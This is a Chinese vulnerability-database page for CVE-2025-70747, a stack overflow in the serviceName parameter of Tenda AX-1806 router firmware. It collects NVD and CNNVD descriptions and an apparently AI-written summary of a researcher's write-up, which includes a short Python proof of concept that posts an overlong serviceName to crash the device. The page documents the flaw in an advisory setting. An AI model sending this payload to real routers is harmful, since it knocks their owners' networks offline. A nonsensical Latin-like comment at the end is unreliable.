支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2025-70747 基础信息
漏洞信息
                                        # N/A

## 概述  
Tenda AX-1806 v1.0.0.1 设备中发现存在栈溢出漏洞,位于 sub_65A28 函数的 serviceName 参数处理过程中。

## 影响版本  
Tenda AX-1806 v1.0.0.1

## 细节  
攻击者可通过构造恶意请求,向 serviceName 参数传入超长数据,触发 sub_65A28 函数中的栈溢出。

## 影响  
可导致拒绝服务(DoS),设备可能崩溃或重启,丧失正常网络功能。
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
N/A
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the serviceName parameter of the sub_65A28 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.
来源:美国国家漏洞数据库 NVD
CVSS信息
N/A
来源:美国国家漏洞数据库 NVD
漏洞类别
N/A
来源:美国国家漏洞数据库 NVD
漏洞标题
Tenda AX1806 安全漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
Tenda AX1806是中国腾达(Tenda)公司的一个 WiFi6 无线路由器。 Tenda AX1806 v1.0.0.1版本存在安全漏洞,该漏洞源于sub_65A28函数的serviceName参数存在栈溢出,可能导致拒绝服务攻击。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
其他
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2025-70747 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2025-70747 的情报信息
  • 标题: VulnbyCola/Tenda/AX-1806/6/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接

    标签:

    神龙速读:
                                            ## 漏洞关键信息
    
    ### 漏洞概要
    - **厂商**: Tenda
    - **产品**: AX-1806
    - **版本**: v1.0.0.1
    - **漏洞类型**: 堆栈溢出 (Stack Overflow)
    - **作者**: Shuhao Shen
    - **机构**: 华中科技大学 (Huazhong University of Science and Technology, HUST)
    
    ### 漏洞原因
    在函数`sub_65A28`中,`serviceName`的值通过用户控制的输入`v2`获取,并使用`strcpy`复制到固定大小的栈缓冲区`v5`中。由于未对源字符串进行长度检查,当`serviceName`参数长度过长时,会出现栈溢出,导致相邻栈内存损坏,最终可能引发服务崩溃和拒绝服务条件。
    
    ### PoC (概念验证)
    为了重现该漏洞,可以按以下步骤操作:
    1. 通过`qemu-system`或其他方式启动固件。
    2. 使用以下PoC代码进行攻击:
    
    ```python
    import requests
    
    url = "http://192.168.20.12/goform/AdvSetMacMtuWan"
    serviceName = "A"*7000
    data = {"serviceName": serviceName}
    
    r = requests.post(url, data=data)
    print(r.status_code, r.text)
    ```
    
    ### 结果
    成功触发漏洞后,目标路由器崩溃,无法持续提供正常服务。
                                            
    VulnbyCola/Tenda/AX-1806/6/1.md at main · 0-fool/VulnbyCola · GitHub
  • https://nvd.nist.gov/vuln/detail/CVE-2025-70747
四、漏洞 CVE-2025-70747 的评论
匿名用户
2026-01-15 06:08:42

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论